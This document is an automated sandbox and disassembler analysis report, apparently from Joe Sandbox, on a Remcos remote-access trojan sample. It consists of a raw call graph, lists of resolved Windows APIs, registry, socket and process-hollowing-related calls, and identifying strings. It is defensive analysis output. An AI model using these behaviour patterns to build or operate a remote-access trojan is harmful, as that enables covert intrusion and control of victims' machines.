46674->47027 46675->46398 46677 41a6f6 46678 405ce6 28 API calls 46677->46678 46679 41a702 46678->46679 47030 406478 76 API calls 46679->47030 46681 41a710 46682 401eea 26 API calls 46681->46682 46683 41a71c 46682->46683 46684 401eea 26 API calls 46683->46684 46685 41a725 46684->46685 46686 401eea 26 API calls 46685->46686 46687 41a72e 46686->46687 46688 401eea 26 API calls 46687->46688 46688->46666 46690 409536 _wcslen 46689->46690 46691 409541 46690->46691 46692 409558 46690->46692 46694 40c89e 32 API calls 46691->46694 46693 40c89e 32 API calls 46692->46693 46695 409560 46693->46695 46696 409549 46694->46696 46697 401e18 26 API calls 46695->46697 46698 401e18 26 API calls 46696->46698 46699 40956e 46697->46699 46700 409553 46698->46700 46701 401e13 26 
API calls 46699->46701 46703 401e13 26 API calls 46700->46703 46702 409576 46701->46702 47050 40856b 28 API calls 46702->47050 46704 4095ad 46703->46704 47035 409837 46704->47035 46707 409588 47051 4028cf 46707->47051 46710 409593 46711 401e18 26 API calls 46710->46711 46712 40959d 46711->46712 46713 401e13 26 API calls 46712->46713 46713->46700 47070 403b40 46714->47070 46718 41a7fd 46719 4028cf 28 API calls 46718->46719 46720 41a807 46719->46720 46721 401e13 26 API calls 46720->46721 46722 41a810 46721->46722 46723 401e13 26 API calls 46722->46723 46724 40dfc3 46723->46724 46724->46451 46726 40e08b 46725->46726 46727 41248f RegQueryValueExA RegCloseKey 46725->46727 46726->46479 46726->46481 46727->46726 46729 4125b0 RegQueryValueExW RegCloseKey 46728->46729 46730 4125dd 46728->46730 46729->46730 46731 403b40 28 API calls 46730->46731 46732 40e0ba 46731->46732 46732->46492 46734 412992 RegDeleteValueW 46733->46734 46735 4129a6 46733->46735 46734->46735 46736 4129a2 46734->46736 46735->46501 46736->46501 46738 40cbc5 46737->46738 46739 41246e 3 API calls 46738->46739 46740 40cbcc 46739->46740 46741 40cbeb 46740->46741 47103 401602 46740->47103 46745 413fd4 46741->46745 46743 40cbd9 47106 4127d5 RegCreateKeyA 46743->47106 46746 413feb 46745->46746 47123 41aa73 46746->47123 46748 413ff6 46749 401d64 28 API calls 46748->46749 46750 41400f 46749->46750 46751 43a5e7 _strftime 42 API calls 46750->46751 46752 41401c 46751->46752 46753 414021 Sleep 46752->46753 46754 41402e 46752->46754 46753->46754 46755 401f66 28 API calls 46754->46755 46756 41403d 46755->46756 46757 401d64 28 API calls 46756->46757 46758 41404b 46757->46758 46759 401fbd 28 API calls 46758->46759 46760 414053 46759->46760 46761 41afc3 28 API calls 46760->46761 46762 41405b 46761->46762 47127 404262 WSAStartup 46762->47127 46764 414065 46765 401d64 28 API calls 46764->46765 46766 41406e 46765->46766 46767 401d64 28 API calls 46766->46767 46792 4140ed 46766->46792 46768 414087 46767->46768 46771 401d64 28 
API calls 46768->46771 46769 401d64 28 API calls 46769->46792 46770 401fbd 28 API calls 46770->46792 46772 414098 46771->46772 46774 401d64 28 API calls 46772->46774 46773 41afc3 28 API calls 46773->46792 46775 4140a9 46774->46775 46777 401d64 28 API calls 46775->46777 46776 4085b4 28 API calls 46776->46792 46778 4140ba 46777->46778 46779 401d64 28 API calls 46778->46779 46781 4140cb 46779->46781 46780 401eef 26 API calls 46780->46792 46783 401d64 28 API calls 46781->46783 46782 401eea 26 API calls 46782->46792 46784 4140dd 46783->46784 47230 404101 87 API calls 46784->47230 46787 414244 WSAGetLastError 47231 41bc76 30 API calls 46787->47231 46792->46769 46792->46770 46792->46773 46792->46776 46792->46780 46792->46782 46792->46787 46794 41a686 79 API calls 46792->46794 46796 404cbf 28 API calls 46792->46796 46797 401d8c 26 API calls 46792->46797 46798 43a5e7 _strftime 42 API calls 46792->46798 46800 405ce6 28 API calls 46792->46800 46801 4027cb 28 API calls 46792->46801 46802 401f66 28 API calls 46792->46802 46808 412513 31 API calls 46792->46808 46832 41446f 46792->46832 47128 413f9a 46792->47128 47134 4041f1 46792->47134 47141 404915 46792->47141 47156 40428c connect 46792->47156 47216 4047eb WaitForSingleObject 46792->47216 47232 404c9e 28 API calls 46792->47232 47233 41a96d GlobalMemoryStatusEx 46792->47233 47234 413683 50 API calls 46792->47234 47235 4082dc 28 API calls 46792->47235 47236 440c51 26 API calls 46792->47236 47237 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46792->47237 46794->46792 46796->46792 46797->46792 46799 414b80 Sleep 46798->46799 46799->46792 46800->46792 46801->46792 46802->46792 46808->46792 46809 403b40 28 API calls 46809->46832 46812 401d64 28 API calls 46813 4144ed GetTickCount 46812->46813 47240 41ad46 28 API calls 46813->47240 46816 41ad46 28 API calls 46816->46832 46819 41aec8 28 API calls 46819->46832 46821 40275c 28 API calls 46821->46832 46822 405ce6 28 API calls 46822->46832 46823 4027cb 28 API calls 46823->46832 46825 
401eea 26 API calls 46825->46832 46826 401e13 26 API calls 46826->46832 46829 401f66 28 API calls 46829->46832 46830 41a686 79 API calls 46830->46832 46831 414b22 CreateThread 46831->46832 47272 419e89 102 API calls 46831->47272 46832->46792 46832->46809 46832->46812 46832->46816 46832->46819 46832->46821 46832->46822 46832->46823 46832->46825 46832->46826 46832->46829 46832->46830 46832->46831 47238 40cbf1 6 API calls 46832->47238 47239 41adee 28 API calls 46832->47239 47241 41aca0 GetLastInputInfo GetTickCount 46832->47241 47242 41ac52 30 API calls ___scrt_fastfail 46832->47242 47243 40e679 29 API calls 46832->47243 47244 4027ec 28 API calls 46832->47244 47245 404468 59 API calls _Yarn 46832->47245 47246 4045d5 111 API calls ___crtLCMapStringA 46832->47246 47247 40a767 84 API calls 46832->47247 46833->46251 46834->46261 46837 4085c0 46836->46837 46838 402e78 28 API calls 46837->46838 46839 4085e4 46838->46839 46839->46282 46841 4124e1 RegQueryValueExA RegCloseKey 46840->46841 46842 41250b 46840->46842 46841->46842 46842->46278 46843->46285 46844->46314 46845->46307 46846->46299 46847->46312 46849 40c8ba 46848->46849 46850 40c8da 46849->46850 46851 40c90f 46849->46851 46853 40c8d0 46849->46853 47273 41a74b 29 API calls 46850->47273 46854 41b15b 2 API calls 46851->46854 46852 40ca03 GetLongPathNameW 46856 403b40 28 API calls 46852->46856 46853->46852 46857 40c914 46854->46857 46859 40ca18 46856->46859 46860 40c918 46857->46860 46861 40c96a 46857->46861 46858 40c8e3 46862 401e18 26 API calls 46858->46862 46863 403b40 28 API calls 46859->46863 46865 403b40 28 API calls 46860->46865 46864 403b40 28 API calls 46861->46864 46866 40c8ed 46862->46866 46867 40ca27 46863->46867 46868 40c978 46864->46868 46869 40c926 46865->46869 46870 401e13 26 API calls 46866->46870 47276 40cc37 28 API calls 46867->47276 46874 403b40 28 API calls 46868->46874 46875 403b40 28 API calls 46869->46875 46870->46853 46872 40ca3a 47277 402860 28 API calls 46872->47277 46877 40c98e 46874->46877 
46878 40c93c 46875->46878 46876 40ca45 47278 402860 28 API calls 46876->47278 47275 402860 28 API calls 46877->47275 47274 402860 28 API calls 46878->47274 46882 40ca4f 46886 401e13 26 API calls 46882->46886 46883 40c999 46887 401e18 26 API calls 46883->46887 46884 40c947 46885 401e18 26 API calls 46884->46885 46889 40c952 46885->46889 46890 40ca59 46886->46890 46888 40c9a4 46887->46888 46891 401e13 26 API calls 46888->46891 46892 401e13 26 API calls 46889->46892 46893 401e13 26 API calls 46890->46893 46895 40c9ad 46891->46895 46896 40c95b 46892->46896 46894 40ca62 46893->46894 46897 401e13 26 API calls 46894->46897 46898 401e13 26 API calls 46895->46898 46899 401e13 26 API calls 46896->46899 46900 40ca6b 46897->46900 46898->46866 46899->46866 46901 401e13 26 API calls 46900->46901 46902 40ca74 46901->46902 46903 401e13 26 API calls 46902->46903 46904 40ca7d 46903->46904 46904->46360 46905->46373 46906->46394 46907->46353 46908->46388 46909->46423 46910->46433 46911->46456 46912->46444 46913->46478 46915 401e0c 46914->46915 46916->46305 46919 40e183 46918->46919 46920 41a65c LoadResource LockResource SizeofResource 46918->46920 46919->46534 46920->46919 46922 401f8e 46921->46922 46928 402325 46922->46928 46924 401fa4 46924->46538 46926 401f86 28 API calls 46925->46926 46927 406066 46926->46927 46927->46545 46929 40232f 46928->46929 46931 40233a 46929->46931 46932 40294a 28 API calls 46929->46932 46931->46924 46932->46931 46934 40250d 46933->46934 46936 40252b 46934->46936 46937 40261a 28 API calls 46934->46937 46936->46549 46937->46936 46938->46551 46939->46551 46940->46559 46941->46570 46942->46574 46943->46578 46944->46580 46947 402e85 46946->46947 46948 402ea9 46947->46948 46949 402e98 46947->46949 46951 402eae 46947->46951 46948->46589 46953 403445 28 API calls 46949->46953 46951->46948 46954 40225b 26 API calls 46951->46954 46953->46948 46954->46948 46956 404bd0 46955->46956 46959 40245c 46956->46959 46958 404be4 46958->46592 46960 402469 46959->46960 46962 
402478 46960->46962 46963 402ad3 28 API calls 46960->46963 46962->46958 46963->46962 46964->46596 46965->46599 46967 401e94 46966->46967 46969 41b183 46968->46969 46970 41b168 GetCurrentProcess IsWow64Process 46968->46970 46969->46610 46970->46969 46971 41b17f 46970->46971 46971->46610 46973 412541 RegQueryValueExA RegCloseKey 46972->46973 46974 412569 46972->46974 46973->46974 46975 401f66 28 API calls 46974->46975 46976 41257e 46975->46976 46976->46613 46977->46621 46979 40b02f 46978->46979 46982 40b04b 46979->46982 46981 40b045 46981->46632 46983 40b055 46982->46983 46985 40b060 46983->46985 46986 40b138 28 API calls 46983->46986 46985->46981 46986->46985 46987->46636 46988->46639 46990 40230d 46989->46990 46991 402325 28 API calls 46990->46991 46992 401f80 46991->46992 46992->46366 47011 43a545 46993->47011 46995 43998b 47020 4392de 38 API calls 3 library calls 46995->47020 46997 439950 46997->46995 46998 439965 46997->46998 47010 40dd54 46997->47010 47018 445354 20 API calls _abort 46998->47018 47000 43996a 47019 43a827 26 API calls _Deallocate 47000->47019 47003 439997 47004 4399c6 47003->47004 47021 43a58a 42 API calls __Tolower 47003->47021 47007 439a32 47004->47007 47022 43a4f1 26 API calls 2 library calls 47004->47022 47023 43a4f1 26 API calls 2 library calls 47007->47023 47008 439af9 _strftime 47008->47010 47024 445354 20 API calls _abort 47008->47024 47010->46381 47010->46383 47012 43a54a 47011->47012 47013 43a55d 47011->47013 47025 445354 20 API calls _abort 47012->47025 47013->46997 47015 43a54f 47026 43a827 26 API calls _Deallocate 47015->47026 47017 43a55a 47017->46997 47018->47000 47019->47010 47020->47003 47021->47003 47022->47007 47023->47008 47024->47010 47025->47015 47026->47017 47031 401e9b 47027->47031 47029 4027d9 47029->46677 47030->46681 47032 401ea7 47031->47032 47033 40245c 28 API calls 47032->47033 47034 401eb9 47033->47034 47034->47029 47036 409855 47035->47036 47037 4124b7 3 API calls 47036->47037 47038 40985c 47037->47038 47039 
409870 47038->47039 47040 40988a 47038->47040 47041 4095cf 47039->47041 47042 409875 47039->47042 47056 4082dc 28 API calls 47040->47056 47041->46417 47054 4082dc 28 API calls 47042->47054 47045 409898 47057 4098a5 85 API calls 47045->47057 47046 409883 47055 409959 29 API calls 47046->47055 47049 409888 47049->47041 47050->46707 47061 402d8b 47051->47061 47053 4028dd 47053->46710 47054->47046 47055->47049 47058 40999f 130 API calls 47055->47058 47056->47045 47057->47041 47059 4099b5 53 API calls 47057->47059 47060 4099a9 125 API calls 47057->47060 47062 402d97 47061->47062 47065 4030f7 47062->47065 47064 402dab 47064->47053 47066 403101 47065->47066 47068 403115 47066->47068 47069 4036c2 28 API calls 47066->47069 47068->47064 47069->47068 47071 403b48 47070->47071 47077 403b7a 47071->47077 47074 403cbb 47086 403dc2 47074->47086 47076 403cc9 47076->46718 47078 403b86 47077->47078 47081 403b9e 47078->47081 47080 403b5a 47080->47074 47082 403ba8 47081->47082 47084 403bb3 47082->47084 47085 403cfd 28 API calls 47082->47085 47084->47080 47085->47084 47087 403dce 47086->47087 47090 402ffd 47087->47090 47089 403de3 47089->47076 47091 40300e 47090->47091 47096 4032a4 47091->47096 47095 40302e 47095->47089 47097 4032b0 47096->47097 47098 40301a 47096->47098 47102 4032b6 28 API calls 47097->47102 47098->47095 47101 4035e8 28 API calls 47098->47101 47101->47095 47109 4395ba 47103->47109 47107 412814 47106->47107 47108 4127ed RegSetValueExA RegCloseKey 47106->47108 47107->46741 47108->47107 47112 43953b 47109->47112 47111 401608 47111->46743 47113 43954a 47112->47113 47114 43955e 47112->47114 47120 445354 20 API calls _abort 47113->47120 47118 43955a __alldvrm 47114->47118 47122 447601 11 API calls 2 library calls 47114->47122 47117 43954f 47121 43a827 26 API calls _Deallocate 47117->47121 47118->47111 47120->47117 47121->47118 47122->47118 47124 41aab9 _Yarn ___scrt_fastfail 47123->47124 47125 401f66 28 API calls 47124->47125 47126 41ab2e 47125->47126 47126->46748 
47127->46764 47129 413fb3 WSASetLastError 47128->47129 47130 413fa9 47128->47130 47129->46792 47248 413e37 35 API calls ___std_exception_copy 47130->47248 47132 413fae 47132->47129 47135 404206 socket 47134->47135 47136 4041fd 47134->47136 47138 404220 47135->47138 47139 404224 CreateEventW 47135->47139 47249 404262 WSAStartup 47136->47249 47138->46792 47139->46792 47140 404202 47140->47135 47140->47138 47142 4049b1 47141->47142 47143 40492a 47141->47143 47142->46792 47144 404933 47143->47144 47145 404987 CreateEventA CreateThread 47143->47145 47146 404942 GetLocalTime 47143->47146 47144->47145 47145->47142 47252 404b1d 47145->47252 47250 41ad46 28 API calls 47146->47250 47148 40495b 47251 404c9e 28 API calls 47148->47251 47150 404968 47151 401f66 28 API calls 47150->47151 47152 404977 47151->47152 47153 41a686 79 API calls 47152->47153 47154 40497c 47153->47154 47155 401eea 26 API calls 47154->47155 47155->47145 47157 4043e1 47156->47157 47158 4042b3 47156->47158 47159 4043e7 WSAGetLastError 47157->47159 47210 404343 47157->47210 47160 4042e8 47158->47160 47162 404cbf 28 API calls 47158->47162 47158->47210 47161 4043f7 47159->47161 47159->47210 47256 420151 27 API calls 47160->47256 47163 4042f7 47161->47163 47164 4043fc 47161->47164 47166 4042d4 47162->47166 47169 401f66 28 API calls 47163->47169 47267 41bc76 30 API calls 47164->47267 47170 401f66 28 API calls 47166->47170 47168 4042f0 47168->47163 47172 404306 47168->47172 47173 404448 47169->47173 47174 4042e3 47170->47174 47171 40440b 47268 404c9e 28 API calls 47171->47268 47179 404315 47172->47179 47180 40434c 47172->47180 47176 401f66 28 API calls 47173->47176 47177 41a686 79 API calls 47174->47177 47181 404457 47176->47181 47177->47160 47178 404418 47182 401f66 28 API calls 47178->47182 47183 401f66 28 API calls 47179->47183 47264 420f34 55 API calls 47180->47264 47184 41a686 79 API calls 47181->47184 47186 404427 47182->47186 47187 404324 47183->47187 47184->47210 47189 41a686 79 API calls 47186->47189 
47190 401f66 28 API calls 47187->47190 47188 404354 47191 404389 47188->47191 47192 404359 47188->47192 47193 40442c 47189->47193 47196 404333 47190->47196 47266 4202ea 28 API calls 47191->47266 47194 401f66 28 API calls 47192->47194 47195 401eea 26 API calls 47193->47195 47198 404368 47194->47198 47195->47210 47199 41a686 79 API calls 47196->47199 47201 401f66 28 API calls 47198->47201 47202 404338 47199->47202 47200 404391 47203 4043be CreateEventW CreateEventW 47200->47203 47205 401f66 28 API calls 47200->47205 47204 404377 47201->47204 47257 420191 47202->47257 47203->47210 47206 41a686 79 API calls 47204->47206 47208 4043a7 47205->47208 47209 40437c 47206->47209 47211 401f66 28 API calls 47208->47211 47265 420592 53 API calls 47209->47265 47210->46792 47213 4043b6 47211->47213 47214 41a686 79 API calls 47213->47214 47215 4043bb 47214->47215 47215->47203 47217 404805 SetEvent CloseHandle 47216->47217 47218 40481c closesocket 47216->47218 47219 40489c 47217->47219 47220 404829 47218->47220 47219->46792 47221 404838 47220->47221 47222 40483f 47220->47222 47271 404ab1 83 API calls 47221->47271 47224 404851 WaitForSingleObject 47222->47224 47225 404892 SetEvent CloseHandle 47222->47225 47226 420191 3 API calls 47224->47226 47225->47219 47227 404860 SetEvent WaitForSingleObject 47226->47227 47228 420191 3 API calls 47227->47228 47229 404878 SetEvent CloseHandle CloseHandle 47228->47229 47229->47225 47230->46792 47231->46792 47232->46792 47233->46792 47234->46792 47235->46792 47236->46792 47237->46792 47238->46832 47239->46832 47240->46832 47241->46832 47242->46832 47243->46832 47244->46832 47245->46832 47246->46832 47247->46832 47248->47132 47249->47140 47250->47148 47251->47150 47255 404b29 101 API calls 47252->47255 47254 404b26 47255->47254 47256->47168 47258 41dc15 47257->47258 47259 420199 47257->47259 47260 41dc23 47258->47260 47269 41cd69 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47258->47269 47259->47210 47270 41d950 
DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47260->47270 47263 41dc2a 47264->47188 47265->47202 47266->47200 47267->47171 47268->47178 47269->47260 47270->47263 47271->47222 47273->46858 47274->46884 47275->46883 47276->46872 47277->46876 47278->46882 47280 40e56a 47279->47280 47281 4124b7 3 API calls 47280->47281 47282 40e60e 47280->47282 47284 40e5fe Sleep 47280->47284 47301 40e59c 47280->47301 47281->47280 47315 4082dc 28 API calls 47282->47315 47284->47280 47287 41ae08 28 API calls 47287->47301 47288 40e619 47289 41ae08 28 API calls 47288->47289 47290 40e625 47289->47290 47316 412774 29 API calls 47290->47316 47293 401e13 26 API calls 47293->47301 47294 40e638 47295 401e13 26 API calls 47294->47295 47297 40e644 47295->47297 47296 401f66 28 API calls 47296->47301 47298 401f66 28 API calls 47297->47298 47299 40e655 47298->47299 47302 4126d2 29 API calls 47299->47302 47300 4126d2 29 API calls 47300->47301 47301->47284 47301->47287 47301->47293 47301->47296 47301->47300 47312 40bf04 73 API calls ___scrt_fastfail 47301->47312 47313 4082dc 28 API calls 47301->47313 47314 412774 29 API calls 47301->47314 47303 40e668 47302->47303 47317 411699 TerminateProcess WaitForSingleObject 47303->47317 47305 40e670 ExitProcess 47318 411637 60 API calls 47306->47318 47313->47301 47314->47301 47315->47288 47316->47294 47317->47305

                              Control-flow Graph

                              APIs
                              • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                              • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$HandleLibraryLoadModule
                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                              • API String ID: 384173800-625181639
                              • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                              • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                              • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                              • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe,00000104), ref: 0040D790
                                • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                              • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-4NJUM7$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                              • API String ID: 2830904901-2551881949
                              • Opcode ID: 3b90c21d5bd73402e256c1a4d47754fca53287f9523db6933c1034fb3aade655
                              • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                              • Opcode Fuzzy Hash: 3b90c21d5bd73402e256c1a4d47754fca53287f9523db6933c1034fb3aade655
                              • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                              Control-flow Graph

                              APIs
                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                              • Sleep.KERNELBASE(00000BB8), ref: 0040E603
                              • ExitProcess.KERNEL32 ref: 0040E672
                              Strings
                              Memory Dump Source
